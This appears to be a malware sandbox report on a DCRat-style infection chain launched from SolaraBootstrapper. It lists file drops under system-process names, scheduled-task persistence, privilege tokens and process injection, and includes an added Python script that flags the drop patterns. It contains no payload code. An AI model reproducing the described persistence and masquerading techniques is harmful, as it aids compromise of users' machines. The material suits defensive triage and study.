File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created \??\c:\Windows\System32\CSC9923422659A044C39A5D951F6C4B4A87.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Windows\System32\sobql9.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Microsoft.NET\RedistList\faildsfsdf.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files (x86)\Internet Explorer\ja-JP\69ddcba757bf72 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File opened for modification C:\Program Files (x86)\Windows Portable Devices\ComContainerbrowserRefRuntime.exe C:\winNet\ComContainerbrowserRefRuntime.exe N/A
File created \??\c:\Program Files (x86)\Internet Explorer\ja-JP\CSC7EF3102F42B4454780319C960827883.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Program Files\WindowsPowerShell\dllhost.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created C:\Program Files\WindowsPowerShell\dllhost.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files\Uninstall Information\1143e5710f078d C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files (x86)\Windows Portable Devices\ComContainerbrowserRefRuntime.exe C:\winNet\ComContainerbrowserRefRuntime.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\unsecapp.exe C:\winNet\ComContainerbrowserRefRuntime.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\29c1c3cc0f7685 C:\winNet\ComContainerbrowserRefRuntime.exe N/A
File created \??\c:\Program Files (x86)\Microsoft.NET\RedistList\CSC7A0F739559C14E76B9FCB2905B968626.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Program Files (x86)\Microsoft.NET\RedistList\faildsfsdf.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Program Files\WindowsPowerShell\CSCBA97CDFE29334993A62C13D44C919133.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created C:\Program Files\WindowsPowerShell\5940a34987c991 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files\Uninstall Information\SolaraBootstrapper.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files (x86)\Internet Explorer\ja-JP\smss.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files (x86)\Windows Defender\ja-JP\SolaraBootstrapper.exe C:\winNet\ComContainerbrowserRefRuntime.exe N/A
File created C:\Program Files (x86)\Windows Defender\ja-JP\1143e5710f078d C:\winNet\ComContainerbrowserRefRuntime.exe N/A
File created \??\c:\Program Files\Uninstall Information\CSC7DE149071344984BABDF789467E5B10.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Program Files (x86)\Internet Explorer\ja-JP\smss.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created C:\Program Files (x86)\Microsoft.NET\RedistList\331d3f61e3e52a C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files (x86)\Windows Portable Devices\33f6b6f444b053 C:\winNet\ComContainerbrowserRefRuntime.exe N/A
File created \??\c:\Program Files\Uninstall Information\SolaraBootstrapper.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Vss\Writers\Application\WmiPrvSE.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File opened for modification C:\Windows\Installer\MSID1AA.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Cursors\smss.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIE63C.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e57cdef.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF495.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Vss\Writers\Application\24dbde2999530e C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Windows\SKB\LanguageModels\RuntimeBroker.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SKB\LanguageModels\9e8d7a4ca61bd9 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Windows\Cursors\69ddcba757bf72 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Windows\fr-FR\088424020bedd6 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created \??\c:\Windows\Vss\Writers\Application\CSC1695FE976BC94F94849813BF48BB424.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File opened for modification C:\Windows\Installer\MSID11B.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSID16A.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\fr-FR\conhost.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Windows\Installer\SourceHash{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC} C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e57cdef.msi C:\Windows\system32\msiexec.exe N/A
File created \??\c:\Windows\SKB\LanguageModels\CSCF579D11E63E4D1AA25EA79FCBFF6CC.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\xdwd.dll C:\Users\Admin\AppData\Local\Temp\faildsfsdf.exe N/A
File created \??\c:\Windows\Vss\Writers\Application\WmiPrvSE.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created C:\Windows\OCR\en-us\RuntimeBroker.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File opened for modification C:\Windows\Installer\MSIF504.tmp C:\Windows\system32\msiexec.exe N/A
File created \??\c:\Windows\SKB\LanguageModels\RuntimeBroker.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
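
Two patterns recur across the Program Files and Windows directory tables above: each persisted executable is accompanied by an extension-less sibling whose name is 14 hex characters (69ddcba757bf72 beside smss.exe, 5940a34987c991 beside dllhost.exe, and so on), and several of the executables are written by the .NET compiler csc.exe, which has no business emitting a PE into Program Files. The script below is an added example, not part of this sandbox report: it parses "File created" rows in the report's own format, groups them by directory and reports both patterns. The sample rows are copied from the two tables above; the rule names and the 14-hex marker regex are the author's own assumptions drawn from what the tables show.

```python
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# Row format of this report's "Drops file in ..." tables:
#   File created <path> <writer process> N/A
# Only creation events are parsed; "File opened for modification" rows are skipped.
FILE_RE = re.compile(r"^File created (?P<path>.+) (?P<writer>\S+) N/A$")

# Extension-less, 14-character lowercase hex name dropped next to each persisted copy.
MARKER_RE = re.compile(r"^[0-9a-f]{14}$")

# Constructed sample: rows copied from the tables above.
SAMPLE_ROWS = [
    r"File created C:\Program Files (x86)\Internet Explorer\ja-JP\69ddcba757bf72 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A",
    r"File created C:\Program Files (x86)\Internet Explorer\ja-JP\smss.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A",
    r"File created \??\c:\Program Files\WindowsPowerShell\dllhost.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A",
    r"File created C:\Program Files\WindowsPowerShell\5940a34987c991 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A",
    r"File created \??\c:\Program Files\WindowsPowerShell\CSCBA97CDFE29334993A62C13D44C919133.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A",
    r"File created C:\Windows\xdwd.dll C:\Users\Admin\AppData\Local\Temp\faildsfsdf.exe N/A",
    r"File opened for modification C:\Windows\Installer\MSID1AA.tmp C:\Windows\system32\msiexec.exe N/A",
]


def parse_drop(line):
    """Return {path, dir, name, writer} for a 'File created' row, or None otherwise."""
    m = FILE_RE.match(line.strip())
    if not m:
        return None
    path = m.group("path")
    if path.startswith("\\??\\"):          # strip the NT object-manager prefix
        path = path[4:]
    p = PureWindowsPath(path)
    # Directory is lower-cased so "\??\c:\..." and "C:\..." rows group together.
    return {"path": path, "dir": str(p.parent).lower(), "name": p.name, "writer": m.group("writer")}


def triage_drops(rows):
    """Return (rule, location, detail) findings for the two drop patterns."""
    created = [e for e in map(parse_drop, rows) if e]
    by_dir = defaultdict(list)
    findings = []
    for e in created:
        by_dir[e["dir"]].append(e)
        # Rule 1: the C# compiler writing an executable (csc.exe as a PE dropper).
        if PureWindowsPath(e["writer"]).name.lower() == "csc.exe" and e["name"].lower().endswith(".exe"):
            findings.append(("compiler_wrote_pe", e["path"], e["writer"]))
    # Rule 2: an .exe and a 14-hex marker file created in the same directory.
    for directory, items in by_dir.items():
        exes = [i["name"] for i in items if i["name"].lower().endswith(".exe")]
        markers = [i["name"] for i in items if MARKER_RE.match(i["name"])]
        if exes and markers:
            findings.append(("marker_sibling", directory, f"{exes[0]} + {markers[0]}"))
    return findings


if __name__ == "__main__":
    for rule, where, detail in triage_drops(SAMPLE_ROWS):
        print(f"{rule:20} {where:50} {detail}")
```

On a live host the same two rules translate directly into a hunt: list directories under Program Files, Windows and Recovery that contain both a recently created .exe and a 14-character hex file with no extension, and check Sysmon or EDR file-create events for csc.exe as the writing image of any .exe. The CSC*.TMP files in the tables are the compiler's normal scratch output and are not flagged; they are useful only as corroboration that the drop went through csc.exe.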

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\Frage build.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\solara.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\winNet\ComContainerbrowserRefRuntime.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\DriversavessessionDlldhcp\Roblox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\faildsfsdf.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5044 wrote to memory of 5072 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\Youtube.exe
PID 5044 wrote to memory of 5072 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\Youtube.exe
PID 5044 wrote to memory of 5072 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\Youtube.exe
PID 5044 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\faildsfsdf.exe
PID 5044 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\faildsfsdf.exe
PID 5072 wrote to memory of 5100 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Result.exe
PID 5072 wrote to memory of 5100 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Result.exe
PID 5072 wrote to memory of 5100 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Result.exe
PID 5072 wrote to memory of 4140 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
PID 5072 wrote to memory of 4140 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
